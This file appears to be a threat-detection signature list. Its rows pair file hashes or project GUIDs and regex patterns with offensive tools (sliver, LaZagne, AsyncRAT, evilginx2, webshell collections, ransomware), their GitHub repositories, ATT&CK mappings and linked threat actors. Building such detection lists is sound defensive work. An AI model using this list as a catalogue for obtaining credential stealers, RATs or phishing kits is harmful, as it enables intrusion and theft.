"*766853465051ea9902106a4f90e84bf5b2bd3f4573f591b02f3882b13beafe85*",".{0,1000}766853465051ea9902106a4f90e84bf5b2bd3f4573f591b02f3882b13beafe85.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29175" "*766d3edb5d2d7129684f21642e1dff9a736583d3e4cc4949c23027803412faa9*",".{0,1000}766d3edb5d2d7129684f21642e1dff9a736583d3e4cc4949c23027803412faa9.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29177" "*7678743a1980ea6c51d430208bf80860d45abf792864ec321c7f1680eff89746*",".{0,1000}7678743a1980ea6c51d430208bf80860d45abf792864ec321c7f1680eff89746.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29178" "*767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d*",".{0,1000}767ba8f7f88dcc0b5488ca7c93a5e29a7a6ed3195b8ac4027e0108db0ff2805d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29179" 
"*76999803e6f8b74f33be250e048d6ef124925cd8919d57a22feef1ed5548a7fa*",".{0,1000}76999803e6f8b74f33be250e048d6ef124925cd8919d57a22feef1ed5548a7fa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29183" "*76a3395be39125fa1185032ca854ebd68bcb2229fa6802d9012bddcbe3b1f2ac*",".{0,1000}76a3395be39125fa1185032ca854ebd68bcb2229fa6802d9012bddcbe3b1f2ac.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29185" "*76a92f0af17e901f6a96d4a1747fa67bab25d2d9a154039742351930865d1bf9*",".{0,1000}76a92f0af17e901f6a96d4a1747fa67bab25d2d9a154039742351930865d1bf9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29187" "*76a9aef76f34f01a3f20cfb3a72fc17340840d07b3acb74e50a9cb1bd0ecc840*",".{0,1000}76a9aef76f34f01a3f20cfb3a72fc17340840d07b3acb74e50a9cb1bd0ecc840.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network 
shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","29188" "*76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e*",".{0,1000}76b70dcbcb1d45935f1b12eef38162b812f88bb4ff89a07a46609d879019103e.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","#filehash","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","29189" "*76b716279c94bd8e32e1e360ddf0994a74ad51bc6fb094a41f11163aef901116*",".{0,1000}76b716279c94bd8e32e1e360ddf0994a74ad51bc6fb094a41f11163aef901116.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29190" "*76c228ff4ca867c361bb5271c961092659ccabe899a45a46e1b0889f0a2e9ec7*",".{0,1000}76c228ff4ca867c361bb5271c961092659ccabe899a45a46e1b0889f0a2e9ec7.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29191" 
"*76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5*",".{0,1000}76c30e2ea86c1c11238c23cc8e6e88ed76cfd666832df7af587036d20a1e98b5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29192" "*76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc*",".{0,1000}76c7648f79cc5a78f49e9ca24b26a82348e0292b3676ae04bdf22a88cb7eeadc.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","29193" "*76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60*",".{0,1000}76d3b949f37c9e74abb3b4bf91727c4feaf3feba1e32a42706a7843cf83d5c60.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29197" "*76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca*",".{0,1000}76d64e0cf551962a2ba20813933207dd398d1d06383c27765874219642218eca.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","29198" "*76d9173d54c6b86022b37c6f8cb1b1585f5613b158c2e6e2baf6ccf45937f234*",".{0,1000}76d9173d54c6b86022b37c6f8cb1b1585f5613b158c2e6e2baf6ccf45937f234.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29199" "*76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51*",".{0,1000}76d92b0b8c428610081a7c45645612af9a7309cafd971a366d5992f5654f5f51.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29200" 
"*76dc564506eb2419fffad94ca1eafd192f053261ec01d97848a259d15698d520*",".{0,1000}76dc564506eb2419fffad94ca1eafd192f053261ec01d97848a259d15698d520.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#filehash","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","29202" "*76de1ef6c3d47c7d2b1c05d493b60d2a846b45b7ab4c7fa162e54a94c24c2960*",".{0,1000}76de1ef6c3d47c7d2b1c05d493b60d2a846b45b7ab4c7fa162e54a94c24c2960.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29203" "*76e94a8b2541bd3c626fa5ac014d78665088f69c3b95925ea4211e68827fa1c0*",".{0,1000}76e94a8b2541bd3c626fa5ac014d78665088f69c3b95925ea4211e68827fa1c0.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","29205" "*76f677acfe19ca1e1e39c391e4923dc38e1e3f752097c5808c171c1d5228194e*",".{0,1000}76f677acfe19ca1e1e39c391e4923dc38e1e3f752097c5808c171c1d5228194e.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","#filehash","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","29207" "*76FFA92B-429B-4865-970D-4E7678AC34EA*",".{0,1000}76FFA92B\-429B\-4865\-970D\-4E7678AC34EA.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","#GUIDproject","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","29208" "*77025f0392d2811d58e8835a03671c0cbbf40f112f1c9cf3c6e864fdb1effa0a*",".{0,1000}77025f0392d2811d58e8835a03671c0cbbf40f112f1c9cf3c6e864fdb1effa0a.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29209" "*770553a2a159b19371ea923733997ed2ff71a9e01a04342d1a7fb61c30eed968*",".{0,1000}770553a2a159b19371ea923733997ed2ff71a9e01a04342d1a7fb61c30eed968.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29211" "*770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621*",".{0,1000}770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - 
T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","29213" "*7716e96debd76da60e286c09150ced547e6e7ed8cba8231d0612d92941833591*",".{0,1000}7716e96debd76da60e286c09150ced547e6e7ed8cba8231d0612d92941833591.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#filehash","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","29214" "*7722284741f36f9fc0bff4902aa9ef837b3635c8b2dd43b58b051c1f08f52a53*",".{0,1000}7722284741f36f9fc0bff4902aa9ef837b3635c8b2dd43b58b051c1f08f52a53.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29215" "*77227879203ee0e49d64978edc6f40c590df6e1bb6260f65340fc713880301e8*",".{0,1000}77227879203ee0e49d64978edc6f40c590df6e1bb6260f65340fc713880301e8.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","29216" "*7728f463c0a51beb209f57662d104263852cfeb2dae58e5903eea3e2bcaea904*",".{0,1000}7728f463c0a51beb209f57662d104263852cfeb2dae58e5903eea3e2bcaea904.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by 
famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29218" "*772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7*",".{0,1000}772a8b19e2abd21dc6f10dc1ac4ff07e52e8f242716c1308e14a1e9fb81e7cd7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29219" "*7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1*",".{0,1000}7734774a6bbb47e7c0f32f4903928df120887180ddae7bb2bd4d15cd17a4a7c1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","29224" "*7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57*",".{0,1000}7739fe1e685d5ec7296d83851614eb9cedaf7472aece8e1144f2b14fa544db57.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29226" "*774a849a2238d98f47427589292c7d1e95a3777631f0afc8787f0a32b0dd2d03*",".{0,1000}774a849a2238d98f47427589292c7d1e95a3777631f0afc8787f0a32b0dd2d03.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29232" "*774f93b89388143ef4f6a9752b171f3a337bf7523b236e6719703a239d56cab2*",".{0,1000}774f93b89388143ef4f6a9752b171f3a337bf7523b236e6719703a239d56cab2.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","29234" "*775aff05c1b0ffd703c1b517169770ac9f4aee6a12a30b2b51b5cdb19e7c85c3*",".{0,1000}775aff05c1b0ffd703c1b517169770ac9f4aee6a12a30b2b51b5cdb19e7c85c3.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","29235" "*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29236" "*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to 
highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#GUIDproject","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29237" "*7760248F-9247-4206-BE42-A6952AA46DA2*",".{0,1000}7760248F\-9247\-4206\-BE42\-A6952AA46DA2.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#GUIDproject","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","29238" "*7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29*",".{0,1000}7760d7ef318933db6b09dba08ec12ddf25ead0512c45bd914256c97470c4eb29.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29239" "*77612014-2E37-4E17-AAFE-9AD4F08B4263*",".{0,1000}77612014\-2E37\-4E17\-AAFE\-9AD4F08B4263.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","29240" "*7767C300-5FD5-4A5D-9D4C-59559CCE48A3*",".{0,1000}7767C300\-5FD5\-4A5D\-9D4C\-59559CCE48A3.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","0","#GUIDproject","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","29241" "*7767C300-5FD5-4A5D-9D4C-59559CCE48A3*",".{0,1000}7767C300\-5FD5\-4A5D\-9D4C\-59559CCE48A3.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","29242" "*7776b5b62b66f36a15558f7004bb319a16a2d68c11bc66b0795ee72866c08e49*",".{0,1000}7776b5b62b66f36a15558f7004bb319a16a2d68c11bc66b0795ee72866c08e49.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29246" "*7778bc98c2588b9136c61b72f7a4120c418ccc2233e3389f239c822eca92db15*",".{0,1000}7778bc98c2588b9136c61b72f7a4120c418ccc2233e3389f239c822eca92db15.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - 
TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29249" "*777d2f709701210daa2b14af49128fbc4949d120f1d112b1c4d5a1453318d89f*",".{0,1000}777d2f709701210daa2b14af49128fbc4949d120f1d112b1c4d5a1453318d89f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29250" "*777d789fe076804229d09cae4fd8abbab955c683ccc11195639b88cc6567786b*",".{0,1000}777d789fe076804229d09cae4fd8abbab955c683ccc11195639b88cc6567786b.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#filehash","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","29251" "*77849d97ebdb4c100d7195a3904fb6b829219bb9f8df46dd81151550546da532*",".{0,1000}77849d97ebdb4c100d7195a3904fb6b829219bb9f8df46dd81151550546da532.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#filehash","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","29252" "*7785670d773d00ffc6e223c4c3ccb1ce7d714204329b12536fd128f80fdfcef9*",".{0,1000}7785670d773d00ffc6e223c4c3ccb1ce7d714204329b12536fd128f80fdfcef9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
